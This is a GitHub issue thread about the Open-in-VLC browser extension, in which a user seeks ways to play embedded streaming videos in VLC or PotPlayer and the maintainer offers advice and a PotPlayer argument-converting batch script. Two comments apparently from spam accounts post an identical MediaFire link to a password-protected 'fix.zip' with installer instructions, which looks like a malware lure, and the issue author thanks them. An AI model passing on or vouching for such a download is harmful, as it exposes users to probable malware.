### ISSUE TITLE
Another famous site that blocks Open-in-vlc but the solution is simple and we hope please the addition of a vital option to avoid blocking : "Open the embed video in a new independent tab"

### ISSUE THREAD

**Issue by trimechee** [andy-portmen/open-in-vlc#65]
Hello, this site is probably the most famous site in the world and where you can see sports replay highlights, the main video player uses high quality and so it is difficult for those who have low cpu or weak connection to playback the videos so I use Open-in vlc but it does not work:

https://livetv.sx/frx/showvideo/1343456_real_madrid_real_valladolid/

https://livetv.sx/frx/video/

so I use my secret method by going to :

chrome://media-internals/

and copying and pasting into a new tab the " kFrameUrl " :

https://emb.apl367.me/player/video.php?id=312662&s=uq6miwjt&w=590&h=384

and i can playback the blocked video with vlc !!

so my suggestion please is to more facilitate and speed up the process and avoid blocking especially for non-experts and to make the project even more popular, mu suggestion is to add an option:

"Open the embed videos in a new independent tab"

and the address of the new tab will be the kFrameUrl so we can playback the videos even if the site blocks Open-in-vlc, thank you very much !

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by trimechee** [comment]
Graet ! Thank you so much :)

**Comment by trimechee** [comment]
Hello Mr @andy-portmen , here is the result of my tests, maybe it could help :
I tested this video with Open in vlc (wih vlc path) and Cat-catch (preview setting=vlc)= the vlc player does not even appear despite the media link being detected :

https://livetv.sx/frx/showvideo/1344108_majorque_soville/

as a last hope, since putting the potplayer patch in Open-in-vlc does not work because potplayer appears but no video displayed, I go to the Cat-catch settings :

Other Settings

Use the local player's call protocol to open video previews

potplayer

and it works !!! vlc opens and there is video playback when using Cat cach Preview with potplayer !

so, and it's surprising, potplayer is officially more powerful and more ideal than vlc  for the playback of streaming videos, hence the capital importance of adding the support of potplayer which has just been updated recently, or inventing a new extension "Open in potplayer" please, thank you so much !

in addition potplayer allows to fit the screen and stretch the video and get rid of black bars
, vlc does not have such an important option, potplayer is definitely better than vlc !!

**Comment by andy-portmen** [comment]
> the vlc player does not even appear despite the media link being detected

I don't understand. Do you mean although the extension detects the media link and passes it to VLC, still VLC does not open?

**Comment by trimechee** [comment]
Yes, vlc does not open at all when i use it whith livetv.sx, , i tried with catsxp, supermium.....same result, is it because vlc is heavy and needs more time to open ? Yet I waited a while , and I tried with potplayer and potplayer opens instantly and succeeds in playing the videos from livetv.sx !

**Comment by andy-portmen** [comment]
Did you know that you can use a batch script as the executable, allowing the script to convert arguments passed by an extension into a format compatible with PotPlayer?


Check the console for a sample output (this is for macOS):

```
['--http-referrer', 'https://www.w3schools.com/html/html5_video.asp?WT.mc_id=14117-DEV-tuts-article8', '--http-user-agent', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Ap…KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36', '--meta-title=HTML Video', 'https://www.w3schools.com/html/mov_bbb.mp4']
```

Then ask a GPT to write the converter for you in batch script

```batch
@echo off
setlocal

:: Initialize variables
set "referrer="
set "user_agent="
set "meta_title="
set "url="

:: Parse VLC arguments
:parse_args
if "%~1"=="" goto endparse
if "%~1"=="--http-referrer" (
    set "referrer=%~2"
    shift /1
) else if "%~1"=="--http-user-agent" (
    set "user_agent=%~2"
    shift /1
) else if "%~1"=="--meta-title=%~2" (
    set "meta_title=%~2"
) else (
    set "url=%~1"
)
shift /1
goto parse_args

:endparse

:: Construct PotPlayer command line arguments
set "potplayer_args=%url%"
if defined referrer set "potplayer_args=%potplayer_args% /referer=%referrer%"
if defined user_agent set "potplayer_args=%potplayer_args% /useragent=%user_agent%"
if defined meta_title set "potplayer_args=%potplayer_args% /title=%meta_title%"

:: Run PotPlayer with the constructed arguments
start "" "C:\Path\To\PotPlayer\PotPlayerMini64.exe" %potplayer_args%

endlocal
```

P.S. I haven't tried this script so you may need to play with it to make it work!

**Comment by trimechee** [comment]
No, i didn't know that ! it seems to be very spectacular revolutionary ! Thank you very much for sharing these interesting and informative executable batch scripts! i wil try to try ! Thank you so much :) 💯 🥇

**Comment by trimechee** [comment]
Mr @andy-portmen , please one last question, sorry it's off topic but the batch script inspired me this question, but maybe it will help me to playbask some complicated streams, in the settings of 3DYD youtube source plugin : 

https://ys.3dyd.com/

there is option "user agent string" in te settings of 3D youtube source , the box is empty so I put "Mozilla/5.0", but should I put only

"Mozilla/5.0" 

or

"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0" , Safari/537.36

to have a compatibility with the maximum of streaming website please ?

I contacted the developer of 3D youtube source plugin when I encountered bugs to send him the bug logs but to my knowledge, I did not receive any answers so I ask you the question, thank you very much :)

**Comment by andy-portmen** [comment]
The second one is correct. use `navigator.userAgent` inside a browser console to get the exact string.

**Comment by trimechee** [comment]
Great ! Thank you so much fir this precious infrmations :) 💯 🥇 

I used to type in google "what is my user agent ?" to copy paste the user agent in 3DYD youtube source, but I noticed in the settings of the mpc-be media player, the default value of the user agent setting is just  Mozilla/5.0, that's why I recently put Mozilla/5.0 in 3DYD youtube source settings user agent.....

so i will follow your advice, maybe it will work with vidmoly videos without needing kframeurl.....thank you again for your immense help:)

**Comment by trimechee** [comment]
And just to say please, after thinking about it, I think the best thing to do please if my suggestion is approved : "Open the embed video in a new independent tab", when the playback with vlc does not work, then we playback the video and if the extension detects the media link, then the extension automatically opens in the background a new tab with the address " kFrameUrl " of chrome://media-internals/ = the user will not be bothered and the user experience will not be affected because the user keeps the main tab in the foreground, and if the playback with vlc fails with the main tab, then the user goes to the kframeurl page opened in the background, then we click on the play button of the video embed kframeurl and thus the extension detects the media link of the original video embed and the playback via vlc succeeds without problem, thank you very much!

**Comment by trimechee** [comment]
Ahh i forget,  few day ago, i installed vlc 4 beta and urlprotocol made by Cat-catch  was uninstalled : 


https://github.com/xifangczy/URLProtocol

vlc 4 beta has feature to fit screen and delete black borders but has bugs and error message....

so i reinstall the stable vlc and i need to add again urlprotocol in vlc path and make new tests.....because i think urlprotocol may have an impact on vlc used by our beloved Open-in-vlc extension...

**Comment by trimechee** [comment]
Edit update : 
 vlc  is opened and appears when i use it whith livetv.sx but there is no playback....

**Comment by andy-portmen** [comment]
> "Open the embed video in a new independent tab", when the playback with vlc does not work...

The extension can detect media on iframes. I don't see the point of opening an iframe in a browser tab. Also when you open an iframe in a browser tab, the website can detect and stop the player (origin of top-frame changes)

**Comment by trimechee** [comment]
We undestand, thank you :)



but since I often visit sports video higlights sites, streaming video .... on several sites impossible to playback embed video, many embed video prohibits playback on vlc, the proof, another famous streaming platform : uqload very present on my favorite streaming site:

4th media player in this site:
https://french-anime.com/animes-vf/844-orient.html

Open in vlc detects the media link but impossible to playback the uqload video embed  in vlc !

but when we detect and open and playback the original link kframe url :

https://uqload.ws/uxv9sm9tk4s0.html

Open-in vlc send video link to vlc and there is playback in vlc !

without kframeurl, it is impossible to playback videos in vlc in uqload, in  livetv.sx and in several platforms such as the platform https://aliez.tv/ whose videos are integrated into the famous world-famous site livetv.sx...


yes it's true, I noticed it, sometimes when I watched a lot of kframeurl videos from the vidmoly platform in a row, when I open the kframeurl link, for example the third vidmoly media player on this site:

https://french-anime.com/animes-vf/1510-wistoria-wand-and-sword.html

after intensive use of kframeurl, sometimes I receive a message that it is not possible  any more to playback the kframeurl videos and i don't have access anymore  to the kframeurl video playback.....

but despite this temporary restriction, the kframeurl solution remains effective and better than nothing, because, if we have a reasonable, not intensive use of kframeurl videos and we respect a reasonable quota, vidmoly does not block kframeurl videos, and I say that because I have actually tested it and kframeurl is the only miracle solution to watch streaming video on my old eee pc with a weak cpu from streaming sites!

yes at first attempts, we can playback vidmoly videos in vlc without needing kframeurl, but after a while the playback in vlc no longer works hence the need for kframeurl....

**Comment by trimechee** [comment]
Mr @andy-portmen , Hello, previously you said right :  ".....you open an iframe in a browser tab, the website can detect and stop the player (origin of top-frame changes)", 


yess , you have right, second media player in this site: 
https://v5. voiranime.com/anime/wistoria-wand-and-sword-vf/wistoria-wand-and-sword-04-vf/ 

when i try to playback the kframeurl: 

https://designparty.sx/e/yh1rk6yvyvhf

 i have message : "This video cannot be watched under this domain."


but here, no need to get the kframeurl from the site https://designparty.sx/ , because we can playback the video with vlc directly in the site:

https://v5.voiranime.com/anime/wistoria- wand-and-sword-vf/wistoria-wand-and-sword-04-vf/

but unlike the first  media player which is vidmoly video on this site:

https://v5.voiranime.com/anime/wistoria-wand-and-sword -vf/wistoria-wand-and-sword-04-vf/

we can't playback directly the video with vlc but fortunately, vidmoly doesn't block the kframeurl (unless we open a lot of kframeurl videos), so open the kframeurl and playback the video becomes the only solution to playback vidmoly video successfully with vlc player, now vidmoly is the only platform that offers standard 480p quality, the designparty.sx/ platform no longer offers the standard 480p quality and only offers the gigantic 1080p quality which is huge for our weak internet and old hdd of almost 13 years, hence my request please for the specific support for vidmoly via kframeurl, thanks a lot !

**Comment by trimechee** [comment]
Update : 

Hello Mr @andy-portmen , i make new tests, for exemple with this video : 

https://livetv.sx/frx/showvideo/1346067_chelsea_crystal_palace/hidescore/

there is no playback with vlc but i right click on Open-in vlc icon and click on copy media liks and send them to clipboard, then i open vlc and paste the media link and it works !! there is playback in vlc when we manually copy past media link ! this is  mystery ! 

i test also with cat catch extension  with vlc and it works without the nedd to manually copy past media link !

**Comment by trimechee** [comment]
Hello Mr @andy-portmen  , I don't know what changed, maybe the new version of catsxp kernel chromium 129 fixes bugs adds improvements, but i tried to preview vidmoly video with Cat catch extension and this is the first time in history I can preview dozens of vidmoly videos with potplayer (first media player on this site) 16 consecutive times without needing kframeurl !!

so the bad news preview vidmoly  doesn't work on our beloved on Open-in vlc bit works in Cat-catch extension !

my theory is maybe because i put the user agent of catsxp browser in 3DYD Youtube Source settings which is integrated with potplayer so i can playback vidmoly video ! so we will be greatful if there is option in Open in vlc to put the user agent of our web browser, maybe it will fix this bug of vidmoly video in Open in vlc, tank you so much ! 

let's note also i put in preview settings of Cat-catch this command because the developer of Cat catch advises us to put this command with problematic sites : 

potplayer://${url} /referer="${referer}"

 i also install urlprotocol of Cat catch  .....

the other  bad news is even with Cat catch,  the second media player on this site works at first then preview video no longer works with potplayer, same thing in Open in vlc, so we hope that the second media player will be fixed please, and the other bad news the second media player prohibits kframeurl, in addition at the beginning when the preview worked with the second media player, potplayer showed me only quality 1080p and not the quality 480p ..... :

https://v5.voiranime.com/anime/mobile-suit-gundam-seed-vf/mobile-suit-gundam-seed-01-vf/


but the good news is let's note my interesting awesome discover : yes  i tired to preview with Open-in vlc extension bit it doesn't work with the second media player, so i go to vlc advanced settings and i go to gnu tls priority enryption and i choose priority to fast enryption and preview works with vlc whn i use Open in vlc !!

**Comment by trimechee** [comment]
Update: Hi, yesterday late at night I talked about this serious download bug to Mr Chandler the developer of the Live-stream-downoader extension and this morning, I am pleasantly surprised that Mr Chandler fixed this bug very quickly: the name of the last commit on Sep 14, 2024  is : position mismatch on decryption :

https:// github. com/ chandler-stimson/ live-stream-downloader
/commit/ 9623d82e367263a28055441144bef51bf945e3f6
